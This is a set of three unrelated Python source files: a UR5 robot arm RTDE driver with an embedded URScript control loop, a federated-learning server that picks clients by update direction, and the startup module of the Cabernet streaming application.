self.c = np.array([10, 10, 10, 7.5, 7.5, 7.5])
self._filter_flag = filter_flag
if self._filter_flag:
self._filtered_wrench = []
self.histories = [list() for i in range(6)]
self._history_length = 25
## filter parameters
Wn=0.1
[self.b2,self.a2]=scipysignal.butter(3,Wn,'lowpass')
[self.b,self.a]=scipysignal.butter(3,(0.03, 0.06),'bandstop')
self.accum_current = np.zeros(6)
def start(self):
"""
Start ur5 controller in a subprocess.
"""
control_process = mp.Process(target = self._start, args = [])
control_process.start()
def _start(self):
# initialize RTDE
"""
General purpose registers (input):
Integer: (0-23)
0: setpoint_id
1: target_type (control mode)
2: [UNUSED]
3: free_drive_active (freedrive mode)
4-9: compliance (for force control)
10-23: [UNUSED] (possibly reserved for gripper-related use)
Double: (0-23)
0-5: target (target configuration, velocity, etc)
6: acceleration (of base joint, for speedj)
7 (1): lookahead (for Model Predictive Control, servoj)
7 (2): damping (for force control)
8: gain (proportional gain for MPC)
9-11: gravity vector
# 12-17: limits (for force control) (CURRENTLY DO NOT USE. HARDCODED)
12-17: target_velocity (for force control)
18-23: task_frame (for force control)
For info on special input registers see:
https://www.universal-robots.com/articles/ur/interface-communication/real-time-data-exchange-rtde-guide/
"""
try:
self._conn = rtde.RTDE(self._robot_host, self._rtde_port)
self._conn.connect()
self._version = self._conn.get_controller_version()
# configure outputs (URControl -> Python)
self._conn.send_output_setup(['timestamp', 'target_q', 'actual_q', 'target_qd',
'actual_qd', 'target_qdd', 'target_moment', 'target_speed_fraction',
'actual_TCP_force', 'actual_current', 'target_current',
'safety_status_bits','robot_status_bits','safety_mode', 'robot_mode']
+ ['output_double_register_{}'.format(i) for i in range(6)],
frequency=250)
# configure inputs (Python -> URControl)
input_names = (['input_int_register_{}'.format(i) for i in range(24)]
+ ['input_double_register_{}'.format(i) for i in range(24)]
+ ['speed_slider_mask', 'speed_slider_fraction'])
self.registers = self._conn.send_input_setup(input_names,
['INT32']*24 + ['DOUBLE']*24 + ['UINT32', 'DOUBLE'])
for name in input_names:
self.registers.__dict__[name] = 0
# start RTDE
self._conn.send_start()
# start the controller program
self._sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._sock.connect((self._robot_host, self._command_port))
self._program = CONTROLLER_PROGRAM.format(cog = self._cog,
payload = self._payload,
gravity = self._gravity,
gripper_flag = self._gripper,
setpoint_none = SETPOINT_NONE,
setpoint_halt = SETPOINT_HALT,
setpoint_position = SETPOINT_POSITION,
setpoint_velocity = SETPOINT_VELOCITY,
setpoint_wrench = SETPOINT_WRENCH,
set_free_drive = SET_FREE_DRIVE,
reg_setpoint = REG_SETPOINT,
reg_type = REG_TYPE,
reg_free_drive_active = REG_FREE_DRIVE_ACTIVE,
reg_compliance = REG_COMPLIANCE,
reg_zero_ftsensor = REG_ZERO_FTSENSOR,
reg_target = REG_TARGET,
reg_acceleration = REG_ACCELERATION,
reg_lookahead = REG_LOOKAHEAD,
reg_damping = REG_DAMPING,
reg_gain = REG_GAIN,
reg_g = REG_G,
reg_limits = REG_LIMITS,
reg_force_target = REG_FORCE_TARGET,
reg_task_frame = REG_TASK_FRAME,
reg_joint_torque = REG_JOINT_TORQUE)
#logger.info('controller program:\n{}'.format(self._program))
self._sock.sendall(self._program.encode('ascii') + b'\n')
self._max_speed_scale = None
self.state = None
self.controlLoop()
finally:
pass
def resend_program(self):
self._sock.sendall(self._program.encode('ascii') + b'\n')
def controlLoop(self):
# NOTE: IGNORE SIGINT!
signal.signal(signal.SIGINT, lambda signal, frame: None)
setpoint_number = 0
self.IO_buffer.lock()
self.IO_buffer.set('running', 1)
self.IO_buffer.unlock()
while True:
t1 = time.time()
state = self._conn.receive()
terr = time.time() - t1
if terr > 0.05:
print("TIMEOUT EXCEEDED {}".format(terr))
print(self.get_input_register(REG_TYPE, 'int'))
if self.state is None and state is None:
time.sleep(0.01)
continue
self.IO_buffer.lock()
stop = self.IO_buffer.get('stop_flag')
self.IO_buffer.unlock()
if stop <= 0:
self._sock.sendall(b'stop program\n')
self._sock.close()
self._sock = None
self._conn.send_pause()
self._conn.disconnect()
self._conn = None
print("disconnecting")
break
else:
self.IO_buffer.lock()
self.IO_buffer.set('stop_flag', stop - 1)
self.IO_buffer.unlock()
if state is not None:
# TODO: estimate state in the case of no sensor feedback
self.state = state
# honor speed scaling set when program started
if self._max_speed_scale is None:
self._max_speed_scale = self.state.target_speed_fraction
self._speed_scale = self.state.target_speed_fraction
# kick watchdog
setpoint_number += 1
self.set_register(REG_SETPOINT, setpoint_number, 'int')
# invoke update
self._update(self.state)
#if this loop exits, disconnect
def setHalt(self):
"""
Stop motion of the UR5.
"""
self.set_register(REG_TYPE, SETPOINT_HALT, 'int')
def setFreedriveMode(self, freedrive_mode):
"""
Enables or disables freedrive on the UR5.
Parameters:
freedrive_mode: Truthy value to enable freedrive; otherwise freedrive is disabled.
"""
if freedrive_mode:
freedrive_mode = 1
else:
freedrive_mode = 0
self.set_register(REG_TYPE, SET_FREE_DRIVE, 'int')
self.set_register(REG_FREE_DRIVE_ACTIVE, freedrive_mode, 'int')
def setPosition(self, q, lookahead=0.1, gain=400):
"""
Set the UR5 to move in position mode to the specified position.
Wraps an eventual `servoj` call.
Parameters:
q: Target joint config.
lookahead: Parameter used for smoothing the path.
Higher = more smoothing (range 0.03 to 0.2, default 0.1)
gain: Proportional gain for following the target.
Higher = faster response (range 100 to 2000, default 400).
Note: High gain with low lookahead may result in instability!
"""
self.set_register(REG_TYPE, SETPOINT_POSITION, 'int')
self.set_register(REG_GAIN, gain, 'double')
self.set_register(REG_LOOKAHEAD, lookahead, 'double')
self.l2r(q, REG_TARGET)
def setVelocity(self, qd, qdd_base=10):
"""
Set the UR5 to move in velocity mode to the specified velocity.
Wraps an eventual `speedj` call.
Parameters:
qd: Target joint velocities.
qdd_base: Acceleration of the base link, rad/s^2.
"""
self.set_register(REG_TYPE, SETPOINT_VELOCITY, 'int')
self.set_register(REG_ACCELERATION, qdd_base, 'double')
self.l2r(qd, REG_TARGET)
def setWrench(self, target, wrench, damping=0.5, task_frame=[0, 0, 0, 0, 0, 0],
compliance=[1, 1, 1, 1, 1, 1]):
"""
Set the UR5 to perform a motion in force mode.
Wraps a force_mode call.
Parameters:
target: Target joint angles to drive to.
wrench: Target wrench in the task frame.
damping: Damping factor applied to the robot motion in force mode; a value
between 0 and 1. The exact behavior is not documented here.
Default: 0.5
task_frame: Reference frame in which the wrench and compliance are expressed.
Relative to the robot base frame.
Order: [X, Y, Z, AX, AY, AZ] (translation, concat with axis-angle orientation.)
Default: [0, 0, 0, 0, 0, 0] (same as robot base frame).
compliance: Degrees of freedom that will be compliant in the end effector.
An array of six values (0 or 1, 1 for compliant).
Order: [X, Y, Z, RX, RY, RZ].
Default: [1, 1, 1, 1, 1, 1] (All dofs compliant).
limits: For compliant DOFs: velocity limits (m/s, rad/s).
For non-compliant DOFs: displacement limits (m, rad).
(Currently hardcoded in the URScript rather than taken as a parameter.)
"""
self.set_register(REG_TYPE, SETPOINT_WRENCH, 'int')
self.l2r(wrench, REG_TARGET)
self.l2r(task_frame, REG_TASK_FRAME)
self.l2r(compliance, REG_COMPLIANCE, "int")
#l2r(limits, self.limits_reg, REG_LIMITS)
self.l2r(target, REG_FORCE_TARGET)
self.set_register(REG_DAMPING, damping, 'double')
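# Illustrative call with hypothetical values, assuming `driver` is a UR5RTDEDriver
# instance: press down with 10 N in the base frame, compliant only along Z, while
# holding the current configuration as the position target:
#   driver.setWrench(target=current_q, wrench=[0, 0, -10, 0, 0, 0],
#                    damping=0.5, task_frame=[0, 0, 0, 0, 0, 0],
#                    compliance=[0, 0, 1, 0, 0, 0])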
#this function is not used
#speed_scale set on teaching pendant directly
def speed_scale(self, s=None):
if s is not None:
self._speed_scale = s
return self._speed_scale
def _update(self, state):
buf = self.IO_buffer
if self._start_time is None:
self._start_time = state.timestamp
t = state.timestamp - self._start_time
dt = t - self.last_t
self.last_t = t
buf.lock()
buf.copy_from_object(state)
pstop = False
if state.safety_status_bits & ur5_constants.PROTECTIVE_STOP_MASK:
buf.unlock()
print("Arm has been protective stopped. Resetting in 6s...")
time.sleep(6.0)
for i in range(5):
try:
self.dashboard_client.unlockProtectiveStop()
break
except Exception:
time.sleep(1)
print("Could not unlock... retry")
continue
print("Resending URScript...")
self.resend_program()
state = self._conn.receive()
self.state = state
if state is None:
return
buf.lock()
buf.copy_from_object(state)
pstop = True
# self.left_limb.controller.setFreeDrive(True)
# print("Entering freedrive. You have 15 seconds until it is disabled.")
# time.sleep(15.0)
# self.left_limb.controller.setFreeDrive(False)
# print("Exiting freedrive and protective stop procedure...")
buf.set("connected", 1)
joint_torques = [self.get_output_register(state, REG_JOINT_TORQUE + i) for i in range(6)]
buf.set("joint_torques", joint_torques)
if self._safe_config is None:
self._safe_config = state.actual_q
target_current = buf.get('target_current')
target_torque = buf.get('target_moment')
c = [a/b if b != 0 else 0 for a, b in zip(target_torque, target_current)]
for i, cv in enumerate(c):
if cv > 6 and cv < 12:
self.c[i] = self.c[i]*0.9 + cv*0.1
current_error = self.c * (np.array(target_current) - buf.get('actual_current'))
self.accum_current = 0.96*self.accum_current + 0.04*current_error
buf.set('current_error', self.accum_current)
#Add and filter wrench here
if self._filter_flag:
wrench = buf.get('actual_TCP_force')
dat = wrench
if len(self.histories[0]) < self._history_length:
for i, x in enumerate(self.histories):
x.append(dat[i])
buf.set('filtered_wrench', wrench)
else:
#filtering all 6 of these takes about 0.1 ms
_filtered_dat = [0.0]*6
for i, x in enumerate(self.histories):
assert len(x) == self._history_length
x.pop(0)
x.append(dat[i])
_filtered_dat[i] = scipysignal.filtfilt(self.b, self.a, x)[self._history_length -1].tolist()
buf.set('filtered_wrench', _filtered_dat[:6])
if pstop:
self.setPosition(self._safe_config, 0.2, 100)
buf.unlock()
self._conn.send(self.registers)
return
if buf.get('zero_ftsensor'):
self.set_register(REG_ZERO_FTSENSOR, 1, regtype="int")
buf.set('zero_ftsensor', 0)
else:
self.set_register(REG_ZERO_FTSENSOR, 0, regtype="int")
if buf.get('use_soft_limit'):
# TODO: velocity
qmin = self.qmin
qmax = self.qmax
else:
qmin = ur5_constants.MIN_JOINTS
qmax = ur5_constants.MAX_JOINTS
stop_robot = False
control_mode = buf.get('control_mode')
if control_mode == SETPOINT_NONE:
#if no commands are set, go to the current position
stop_robot = True
elif control_mode == SETPOINT_HALT:
self.setHalt()
elif control_mode == SETPOINT_POSITION:
q_commanded = buf.get('q_commanded')
if self.isFormatted(q_commanded):
if not in_limits(q_commanded, qmin, qmax):
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
else:
lookahead = buf.get("lookahead")
delta = np.array(q_commanded) - state.actual_q
qd_limit = 3 * lookahead
max_qd = np.max(np.abs(delta))
if max_qd > qd_limit:
delta = delta * qd_limit / max_qd
self.setPosition(state.actual_q + delta, lookahead)
else:
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print(q_commanded)
print("Warning, improper position formatting. Halting")
elif control_mode == SETPOINT_VELOCITY:
qdot_commanded = buf.get('qdot_commanded')
if self.isFormatted(qdot_commanded):
if in_limits(qdot_commanded, self.vmin, self.vmax):
q_next = vectorops.madd(state.actual_q, qdot_commanded, dt)
#commanded velocity is rad/s
#only want to check next position limits of robot not gripper
#UR5_CL is the configuration length of just the UR5 robot = 6
if not in_limits(q_next, qmin, qmax):
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print("Warning, exceeding joint limits. Halting")
else:
self.setVelocity(qdot_commanded)
else:
buf.set('control_mode', SETPOINT_NONE)
stop_robot = True
print("Warning, improper velocity formatting. Halting")
elif control_mode == SETPOINT_WRENCH:
q_commanded = buf.get('q_commanded')
wrench_commanded = buf.get('wrench_commanded')
if not in_limits(q_commanded, qmin, qmax):
stop_robot = True
print("Warning, exceeding joint limits. Halting")
else:
damping_commanded = buf.get('damping_commanded')
task_frame = buf.get('task_frame')
self.setWrench(q_commanded, wrench_commanded, damping_commanded, task_frame)
elif control_mode == SET_FREE_DRIVE:
self.setFreedriveMode(buf.get('free_drive_commanded'))
#print(pinchness(state.actual_q))
if not in_limits(state.actual_q, qmin, qmax):
stop_robot = True
#if in_pinch(state.actual_q, pinch_radius = 0.12):
# stop_robot = True
if not stop_robot:
self._safe_config = state.actual_q
# NOTE: falling back to the last known safe configuration is a rough but serviceable safeguard.
if stop_robot:
self.setPosition(self._safe_config, 0.2, 100)
self.setGravity(buf.get('gravity'))
# clamp speed scale
self._speed_scale = max(min(self._speed_scale, self._max_speed_scale), 0)
self.registers.speed_slider_mask = 1
self.registers.speed_slider_fraction = self._speed_scale
# send gravity
self.l2r(self._gravity, REG_G, "double", 3)
buf.unlock()
self._conn.send(self.registers)
def isFormatted(self, val):
#validate that val is a properly sized joint configuration
if val:
if len(val) == ur5_constants.UR5_CONFIG_LEN:
return True
else:
print("Error, val: ", val, " is not formatted correctly")
return False
def setGravity(self,g):
self._gravity = deepcopy(g)
@property
def version(self):
return self._version
########################################
# Some utility functions
########################################
def r2l(self, base=0, regtype="double", n=6):
"""
Convert consecutive register values to a list.
Parameters:
base: Register index to start from (inclusive).
regtype: Register type, "double" or "int".
n: Number of consecutive registers to read.
Return:
List of n values read from the input registers.
"""
ret = []
for i in range(n):
ret.append(self.registers.__dict__['input_{}_register_{}'.format(regtype, base + i)])
return ret
def l2r(self, input_list, base=0, regtype="double", n=6):
"""
Write values in a list to consecutive registers.
Parameters:
input_list: List of values to write.
base: Register index to start from (inclusive).
regtype: Register type, "double" or "int".
n: Number of consecutive registers to write.
"""
for i in range (n):
self.registers.__dict__['input_{}_register_{}'.format(regtype, base + i)] = input_list[i]
def set_register(self, regnum, value, regtype="double"):
"""
Set a value in a register.
Parameters:
regnum: Input register index.
value: Value to write.
regtype: Register type, "double" or "int".
"""
self.registers.__dict__['input_{}_register_{}'.format(regtype, regnum)] = value
def get_input_register(self, regnum, regtype="double"):
"""
Get a value in an input register.
Parameters:
regnum: Input register index.
regtype: Register type, "double" or "int".
Return:
The value.
"""
return self.registers.__dict__['input_{}_register_{}'.format(regtype, regnum)]
def get_output_register(self, registers, regnum, regtype="double"):
"""
Get a value in an output register.
Parameters:
registers: RTDE output data object (e.g. the state returned by receive()).
regnum: Output register index.
regtype: Register type, "double" or "int".
Return:
The value.
"""
return registers.__dict__['output_{}_register_{}'.format(regtype, regnum)]
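# Illustrative mapping used by the helpers above: set_register(REG_GAIN, 300, 'double')
# writes self.registers.input_double_register_8, and
# get_output_register(state, REG_JOINT_TORQUE + 2) reads state.output_double_register_2.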
#RTDE script sent to UR5
CONTROLLER_PROGRAM = '''
stop program
socket_send_string("close popup", "internal")
socket_send_byte(10, "internal")
def rtde_control_loop():
# Tare the FT sensor
zero_ftsensor()
# constants
SETPOINT_TIMEOUT = 125
SETPOINT_NONE = {setpoint_none}
SETPOINT_HALT = {setpoint_halt}
SETPOINT_POSITION = {setpoint_position}
SETPOINT_VELOCITY = {setpoint_velocity}
SET_FREE_DRIVE = {set_free_drive}
SETPOINT_WRENCH = {setpoint_wrench}
CONTROL_PERIOD = 0.004
RTDE_WATCHDOG_FREQUENCY = 1
# robotiq gripper
GRIPPER_FLAG = {gripper_flag}
# integer registers
REG_SETPOINT = {reg_setpoint}
REG_TYPE = {reg_type}
REG_FREE_DRIVE_ACTIVE = {reg_free_drive_active}
REG_COMPLIANCE = {reg_compliance}
REG_ZERO_FTSENSOR = {reg_zero_ftsensor}
# input double registers
REG_TARGET = {reg_target}
REG_ACCELERATION = {reg_acceleration}
REG_LOOKAHEAD = {reg_lookahead}
REG_DAMPING = {reg_damping}
REG_GAIN = {reg_gain}
REG_G = {reg_g}
REG_LIMITS = {reg_limits}
REG_FORCE_TARGET = {reg_force_target}
REG_TASK_FRAME = {reg_task_frame}
# output double registers
REG_JOINT_TORQUE = {reg_joint_torque}
# I/O configuration
set_standard_analog_input_domain(0, 1)
set_standard_analog_input_domain(1, 1)
set_tool_analog_input_domain(0, 1)
set_tool_analog_input_domain(1, 1)
set_analog_outputdomain(0, 0)
set_analog_outputdomain(1, 0)
set_input_actions_to_default()
if GRIPPER_FLAG:
set_tool_voltage(24)
set_tool_communication(True,115200,0,1,1.5,3.5)
else:
set_tool_voltage(0)
end
# tool configuration
set_payload_cog([{cog[0]}, {cog[1]}, {cog[2]}])
set_payload({payload})
set_gravity([{gravity[0]}, {gravity[1]}, {gravity[2]}])
setpoint_number = read_input_integer_register(REG_SETPOINT)
last_setpoint_number = setpoint_number
missed_setpoints = 0
# Watchdog: if input_int_register_0 (the setpoint counter) is not updated at the
# requested rate, the program is stopped.
rtde_set_watchdog("input_int_register_0", RTDE_WATCHDOG_FREQUENCY, "stop")
in_force_mode = 0
tick_num = 0
while True:
setpoint_number = read_input_integer_register(REG_SETPOINT)
if setpoint_number == last_setpoint_number:
missed_setpoints = missed_setpoints + 1
else:
missed_setpoints = 0
end
tick_num = tick_num + 1
last_setpoint_number = setpoint_number
if missed_setpoints >= SETPOINT_TIMEOUT:
popup("setpoint timeout", title="PyUniversalRobot", error=True)
halt
end
should_zero = read_input_integer_register(REG_ZERO_FTSENSOR)
if should_zero == 1:
zero_ftsensor()
end
# update the setpoint
write_output_integer_register(0, setpoint_number)
joint_torques = get_joint_torques()
write_output_float_register(REG_JOINT_TORQUE + 0, joint_torques[0])
write_output_float_register(REG_JOINT_TORQUE + 1, joint_torques[1])
write_output_float_register(REG_JOINT_TORQUE + 2, joint_torques[2])
write_output_float_register(REG_JOINT_TORQUE + 3, joint_torques[3])
write_output_float_register(REG_JOINT_TORQUE + 4, joint_torques[4])
write_output_float_register(REG_JOINT_TORQUE + 5, joint_torques[5])
target = [0, 0, 0, 0, 0, 0]
target[0] = read_input_float_register(REG_TARGET + 0)
target[1] = read_input_float_register(REG_TARGET + 1)
target[2] = read_input_float_register(REG_TARGET + 2)
target[3] = read_input_float_register(REG_TARGET + 3)
target[4] = read_input_float_register(REG_TARGET + 4)
target[5] = read_input_float_register(REG_TARGET + 5)
G = [0,0,0]
G[0] = read_input_float_register(REG_G + 0)
G[1] = read_input_float_register(REG_G + 1)
G[2] = read_input_float_register(REG_G + 2)
set_gravity(G)
type = read_input_integer_register(REG_TYPE)
if type == SETPOINT_WRENCH:
if tick_num % 5 == 1:
force_mode_set_gain_scaling(2.0)
damping = read_input_float_register(REG_DAMPING)
force_mode_set_damping(damping)
# TODO: Write a helper?
compliance = [0, 0, 0, 0, 0, 0]
compliance[0] = read_input_integer_register(REG_COMPLIANCE + 0)
compliance[1] = read_input_integer_register(REG_COMPLIANCE + 1)
compliance[2] = read_input_integer_register(REG_COMPLIANCE + 2)
compliance[3] = read_input_integer_register(REG_COMPLIANCE + 3)
compliance[4] = read_input_integer_register(REG_COMPLIANCE + 4)
compliance[5] = read_input_integer_register(REG_COMPLIANCE + 5)
task_frame = p[0, 0, 0, 0, 0, 0]
task_frame[0] = read_input_float_register(REG_TASK_FRAME + 0)
task_frame[1] = read_input_float_register(REG_TASK_FRAME + 1)
task_frame[2] = read_input_float_register(REG_TASK_FRAME + 2)
task_frame[3] = read_input_float_register(REG_TASK_FRAME + 3)
task_frame[4] = read_input_float_register(REG_TASK_FRAME + 4)
task_frame[5] = read_input_float_register(REG_TASK_FRAME + 5)
# hardcoded for now...
limits = [5, 5, 5, 5, 5, 5]
# limits[0] = read_input_float_register(REG_LIMITS + 0)
# limits[1] = read_input_float_register(REG_LIMITS + 1)
# limits[2] = read_input_float_register(REG_LIMITS + 2)
# limits[3] = read_input_float_register(REG_LIMITS + 3)
# limits[4] = read_input_float_register(REG_LIMITS + 4)
# limits[5] = read_input_float_register(REG_LIMITS + 5)
force_mode(task_frame, compliance, target, 2, limits)
in_force_mode = 1
end
if in_force_mode == 1:
target_pos = [0, 0, 0, 0, 0, 0]
target_pos[0] = read_input_float_register(REG_FORCE_TARGET + 0)
target_pos[1] = read_input_float_register(REG_FORCE_TARGET + 1)
target_pos[2] = read_input_float_register(REG_FORCE_TARGET + 2)
target_pos[3] = read_input_float_register(REG_FORCE_TARGET + 3)
target_pos[4] = read_input_float_register(REG_FORCE_TARGET + 4)
target_pos[5] = read_input_float_register(REG_FORCE_TARGET + 5)
# hardcoded for now...
lookahead = 0.02
gain = 300
acceleration = 10
#speedj(target_pos, acceleration, CONTROL_PERIOD)
servoj(target_pos, 0, 0, CONTROL_PERIOD, lookahead, gain)
end
elif in_force_mode == 1:
in_force_mode = 0
end_force_mode()
end
if type == SETPOINT_WRENCH:
do_nothing = 0
elif type == SET_FREE_DRIVE:
free_drive_active = read_input_integer_register(REG_FREE_DRIVE_ACTIVE)
if free_drive_active == 1:
freedrive_mode()
else:
end_freedrive_mode()
end
elif type == SETPOINT_HALT:
# issue command
popup("halt command issued", title="PyUniversalRobot", error=True)
halt
elif type == SETPOINT_POSITION:
# read lookahead and gain parameters
lookahead = read_input_float_register(REG_LOOKAHEAD)
if lookahead > 0.2:
# In case we transitioned partially from force mode to position mode
lookahead = 0.2
end
gain = read_input_float_register(REG_GAIN)
# issue command
# NOTE: acceleration and velocity arguments are ignored
servoj(target, 0, 0, CONTROL_PERIOD, lookahead, gain)
elif type == SETPOINT_VELOCITY:
# read acceleration parameter
acceleration = read_input_float_register(REG_ACCELERATION)
# issue command
speedj(target, acceleration, CONTROL_PERIOD)
else:
# alert and quit
popup("unknown setpoint type received", title="PyUniversalRobot", error=True)
halt
end
end
end
'''
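# --- Illustrative usage sketch (not part of the driver) ---
# The driver expects IO_buffer to behave like a lockable shared-memory mapping; the stub
# below is a hypothetical single-process stand-in that only shows the interface relied on
# above (lock/unlock, get/set, copy_from_object, and keys such as 'running', 'stop_flag',
# 'control_mode', 'q_commanded', 'lookahead', 'gravity', 'zero_ftsensor'). The host
# address, velocity limits, and dashboard client below are placeholders.
import threading
class _StubIOBuffer(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self._lock = threading.Lock()
    def lock(self):
        self._lock.acquire()
    def unlock(self):
        self._lock.release()
    def set(self, key, value):
        self[key] = value
    def copy_from_object(self, obj):
        # copy the public attributes of an RTDE state object into the buffer
        for name, value in vars(obj).items():
            self[name] = value
# buf = _StubIOBuffer({'stop_flag': 100, 'control_mode': SETPOINT_NONE,
#                      'gravity': [0, 0, 9.82], 'zero_ftsensor': 0,
#                      'use_soft_limit': 0, 'lookahead': 0.1})
# driver = UR5RTDEDriver('192.168.0.10', buf, filter_flag=False,
#                        qmin=ur5_constants.MIN_JOINTS, qmax=ur5_constants.MAX_JOINTS,
#                        vmin=[-3.14] * 6, vmax=[3.14] * 6,
#                        dashboard_client=None)
# driver.start()  # spawns the control subprocess (requires a reachable robot)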
|
directed.py
|
import logging
from server import Server
import numpy as np
from threading import Thread
class DirectedServer(Server):
"""Federated learning server that uses profiles to direct during selection."""
# Run federated learning
def run(self):
# Perform profiling on all clients
self.profiling()
# Continue federated learning
super().run()
# Federated learning phases
def selection(self):
import fl_model # pylint: disable=import-error
clients = self.clients
clients_per_round = self.config.clients.per_round
profiles = self.profiles
w_previous = self.w_previous
# Extract directors from profiles
directors = [d for _, d in profiles]
# Extract most recent model weights
w_current = self.flatten_weights(fl_model.extract_weights(self.model))
model_direction = w_current - w_previous
# Normalize model direction
model_direction = model_direction / \
np.sqrt(np.dot(model_direction, model_direction))
# Update previous model weights
self.w_previous = w_current
# Generate client director scores (closer direction is better)
scores = [np.dot(director, model_direction) for director in directors]
# Apply punishment for repeatedly selected clients
p = self.punishment
scores = [x * (0.9)**p[i] for i, x in enumerate(scores)]
# Select clients with highest scores
sample_clients_index = []
for _ in range(clients_per_round):
top_score_index = scores.index(max(scores))
sample_clients_index.append(top_score_index)
# Overwrite to avoid reselection
scores[top_score_index] = min(scores) - 1
# Extract selected sample clients
sample_clients = [clients[i] for i in sample_clients_index]
# Update punishment factors
self.punishment = [
p[i] + 1 if i in sample_clients_index else 0 for i in range(len(clients))]
return sample_clients
def profiling(self):
import fl_model # pylint: disable=import-error
# Use all clients for profiling
clients = self.clients
# Configure clients for training
self.configuration(clients)
# Train on clients to generate profile weights
threads = [Thread(target=client.train) for client in self.clients]
[t.start() for t in threads]
[t.join() for t in threads]
# Receive client reports
reports = self.reporting(clients)
# Extract weights from reports
weights = [report.weights for report in reports]
weights = [self.flatten_weights(weight) for weight in weights]
# Extract initial model weights
w0 = self.flatten_weights(fl_model.extract_weights(self.model))
# Save as initial previous model weights
self.w_previous = w0.copy()
# Update initial model using results of profiling
# Perform weight aggregation
logging.info('Aggregating updates')
updated_weights = self.aggregation(reports)
# Load updated weights
fl_model.load_weights(self.model, updated_weights)
# Calculate direction vectors (directors)
directors = [(w - w0) for w in weights]
# Normalize directors to unit length
directors = [d / np.sqrt(np.dot(d, d)) for d in directors]
# Initialize punishment factors
self.punishment = [0 for _ in range(len(clients))]
# Use directors for client profiles
self.profiles = [(client, directors[i])
for i, client in enumerate(clients)]
return self.profiles
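# --- Illustrative sketch (standalone, hypothetical data) ---
# The selection rule above scores each client by the alignment between its profiling
# direction ("director") and the most recent global model direction, then discounts
# clients that were selected repeatedly. The sketch below reproduces that scoring on
# synthetic vectors; all names, shapes, and punishment counts are placeholders.
def _demo_directed_selection(num_clients=5, dim=8, per_round=2, seed=0):
    rng = np.random.default_rng(seed)
    directors = rng.normal(size=(num_clients, dim))
    directors /= np.linalg.norm(directors, axis=1, keepdims=True)
    model_direction = rng.normal(size=dim)
    model_direction /= np.linalg.norm(model_direction)
    punishment = np.array([0, 2, 0, 1, 0])  # hypothetical prior selection counts
    scores = directors @ model_direction * (0.9 ** punishment)
    # pick the per_round highest-scoring clients without replacement
    selected = np.argsort(scores)[::-1][:per_round]
    return selected, scores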
|
main.py
|
"""
MIT License
Copyright (C) 2021 ROCKY4546
https://github.com/rocky4546
This file is part of Cabernet
Permission is hereby granted, free of charge, to any person obtaining a copy of this software
and associated documentation files (the "Software"), to deal in the Software without restriction,
including without limitation the rights to use, copy, modify, merge, publish, distribute,
sublicense, and/or sell copies of the Software, and to permit persons to whom the Software
is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
"""
import gc
import argparse
import logging
import os
import platform
import sys
import time
from multiprocessing import Queue, Process
import lib.clients.hdhr.hdhr_server as hdhr_server
import lib.clients.web_tuner as web_tuner
import lib.clients.web_admin as web_admin
import lib.common.utils as utils
import lib.plugins.plugin_handler as plugin_handler
import lib.clients.ssdp.ssdp_server as ssdp_server
import lib.db.datamgmt.backups as backups
from lib.db.db_scheduler import DBScheduler
from lib.common.utils import clean_exit
from lib.common.pickling import Pickling
from lib.schedule.scheduler import Scheduler
from lib.common.decorators import getrequest
from lib.web.pages.templates import web_templates
try:
import pip
except ModuleNotFoundError:
print('Unable to load pip module to install modules')
try:
import cryptography
except ImportError:
# pip.main(['install', 'cryptography'])
print('Unable to load cryptography module, will not encrypt passwords')
import lib.config.user_config as user_config
RESTART_REQUESTED = None
if sys.version_info.major == 2 or sys.version_info < (3, 7):
print('Error: cabernet requires python 3.7+.')
sys.exit(1)
def get_args():
parser = argparse.ArgumentParser(description='Fetch online streams', epilog='')
parser.add_argument('-c', '--config_file', dest='cfg', type=str, default=None, help='config.ini location')
parser.add_argument('-r', '--restart', help='Restart process')
return parser.parse_args()
def restart_cabernet(_plugins):
global RESTART_REQUESTED
RESTART_REQUESTED = True
while RESTART_REQUESTED:
time.sleep(0.10)
@getrequest.route('/pages/restart')
def restart_api(_webserver):
scheduler_db = DBScheduler(_webserver.config)
tasks = scheduler_db.get_tasks('Applications', 'Restart')
if len(tasks) == 1:
_webserver.sched_queue.put({'cmd': 'runtask', 'taskid': tasks[0]['taskid'] })
_webserver.do_mime_response(200, 'text/html', 'Restarting Cabernet')
else:
_webserver.do_mime_response(404, 'text/html', web_templates['htmlError'].format('404 - Request Not Found'))
def main(script_dir):
""" main startup method for app """
global RESTART_REQUESTED
hdhr_serverx = None
ssdp_serverx = None
webadmin = None
tuner = None
# Gather args
args = get_args()
if args.restart:
time.sleep(0.01)
# Get Operating system
opersystem = platform.system()
config_obj = None
try:
RESTART_REQUESTED = False
config_obj = user_config.get_config(script_dir, opersystem, args)
config = config_obj.data
logger = logging.getLogger(__name__)
logger.warning('#########################################')
logger.warning('MIT License, Copyright (C) 2021 ROCKY4546')
logger.info('Initiating Cabernet v{}'.format(utils.get_version_str()))
utils.cleanup_web_temp(config)
logger.info('Getting Plugins...')
plugins = plugin_handler.PluginHandler(config_obj)
plugins.initialize_plugins()
config_obj.defn_json = None
scheduler_db = DBScheduler(config)
scheduler_db.save_task(
'Applications',
'Restart',
'internal',
None,
'lib.main.restart_cabernet',
20,
'inline',
'Restarts Cabernet'
)
if opersystem in ['Windows']:
pickle_it = Pickling(config)
pickle_it.to_pickle(plugins)
backups.scheduler_tasks(config)
hdhr_queue = Queue()
sched_queue = Queue()
logger.info('Starting admin website on {}:{}'.format(
config['web']['plex_accessible_ip'],
config['web']['web_admin_port']))
webadmin = Process(target=web_admin.start, args=(plugins, hdhr_queue, sched_queue))
webadmin.start()
time.sleep(0.1)
logger.info('Starting streaming tuner website on {}:{}'.format(
config['web']['plex_accessible_ip'],
config['web']['plex_accessible_port']))
tuner = Process(target=web_tuner.start, args=(plugins, hdhr_queue,))
tuner.start()
time.sleep(0.1)
scheduler = Scheduler(plugins, sched_queue)
time.sleep(0.1)
if not config['ssdp']['disable_ssdp']:
logger.info('Starting SSDP service on port 1900')
ssdp_serverx = Process(target=ssdp_server.ssdp_process, args=(config,))
ssdp_serverx.daemon = True
ssdp_serverx.start()
if not config['hdhomerun']['disable_hdhr']:
logger.info('Starting HDHR service on port 65001')
hdhr_serverx = Process(target=hdhr_server.hdhr_process, args=(config, hdhr_queue,))
hdhr_serverx.start()
